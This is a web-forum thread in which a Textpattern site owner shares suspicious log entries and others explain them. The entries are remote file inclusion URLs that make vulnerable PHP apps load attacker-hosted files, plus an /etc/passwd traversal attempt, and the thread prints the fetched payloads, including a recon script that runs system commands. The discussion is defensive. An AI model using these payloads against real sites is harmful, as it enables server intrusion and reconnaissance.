Textpattern CMS support forum
You are not logged in. Register | Login | Help
- Topics: Active | Unanswered
Spurious URLs in visitor logs (id1.txt)
Over the past few days I’ve had some odd entries in the TXP logs on one of my sites. They look to me like a series of exploits from various IPs targeting different programs to, I assume, inject the name of somebody or some URL into the HTML page code. It doesn’t look any more sinister than that and, as far as I can tell, TXP is immune. They all seem to try to load some code in a file based on some permutation of id1.txt.
I can’t see anything changed on my server and the MySQL database seems ok so I don’t think these attempts amount to anything, but in case it’s anything more ominous and I’ve just not looked hard enough, here are the results of my sleuthing. Anyone who has any info on these things, has seen them before, knows what they might be trying to do or what they think they can achieve, please feel free to enlighten me. Thanks!
Attempt 1
URL in TXP log: http://site.com/?PHORUM[settings_dir]=http://phoviet.vn.net//backend/id1.txt???
OR http://site.com/section/article//flash/initialise.php?foing_root_path=http://bobbydonut.com/stephanie/id11.txt??
IP: 91.121.181.60 ns1.hardlogin.com OR 74.86.17.106
Contents of id1.txt / id11.txt:
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>Attempt 2
URL in TXP log: http://site.com/index.php?pag=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt??
IP: 69.16.250.4 noc88.noc88.com
Contents of id1.txt:
zfxid.txt
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>Attempt 3
URL in TXP log: http://site.com/section/article//plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??
IP: 91.192.110.155 155-110.furanet.com OR 80.55.55.178 rd178.internetdsl.tpnet.pl
The contents of id1.txt returns a 404, but it first does some URL rewriting to translate the address to: http://www.hyonsvc.co.kr//%E2%80%8Bbbs//%E2%80%8Bupload/%E2%80%8Bid1.%E2%80%8Btxt?%E2%80%8B?
Attempt 4
URL in TXP log: http:///?pag=http://basic-it.de/phpShop/soap/id.txt?
IP: 94.75.207.2
Contents of id.txt:
<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }
echo "xucx<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "xucx was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;Attempt 5 (classic /etc/passwd access attempt)
URL in TXP log: index.php?pag=../../../../../../../../../../../../../etc/passwd%00
IP: 69.162.109.186 illusion-hosting.net OR 216.22.48.76
The smd plugin menagerie — for when you need one more gribble of power from Textpattern. Bleeding-edge code available on GitHub.
Txp Builders – finely-crafted code, design and Txp
Offline
Re: Spurious URLs in visitor logs (id1.txt)
I see stuff like this pretty regularly.
Piwik Dashboard, Google Analytics Dashboard, Minibar, Article Image Colorpicker, Admin Datepicker, Admin Google Map, Admin Colorpicker
Offline
Re: Spurious URLs in visitor logs (id1.txt)
Anyone who has any info on these things, has seen them before, knows what they might be trying to do or what they think they can achieve, please feel free to enlighten me.
Nothing related to TXP. Just random script kids that are nothing to worry about.
- First one is for old Phorum. The URL itself says what it relies and tries: Global is set by the URL, server includes the settings file and the page dies. TXP doesn’t register variables from URLs (if plugins nor server isn’t set it to).
- URL’s acronym answers: Sad and famous BackUpWordPress.
Offline
Re: Spurious URLs in visitor logs (id1.txt)
I am getting it from http://www.zywesrebro.pl/fotki/fx29id1.txt
through
http://www.mysite.tld//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.zywesrebro.pl/fotki/fx29id1.txt?
and
http://skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.zywesrebro.pl/fotki/fx29id1.txt?
content:
zfxid.txt
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>Yiannis
——————————
NeMe | hblack.art | EMAP | A Sea change | Toolkit of Care
I do my best editing after I click on the submit button.
Offline
Re: Spurious URLs in visitor logs (id1.txt)
May be some pattern you site was recognised to use Phorum scripts and got in hackers base as potentially buggie :) Nothing to worry, I think.
Providing help in hacking ATM! Come to courses and don’t forget to bring us notebook and hammer! What for notebook? What a kind of hacker you are without notebok?
Offline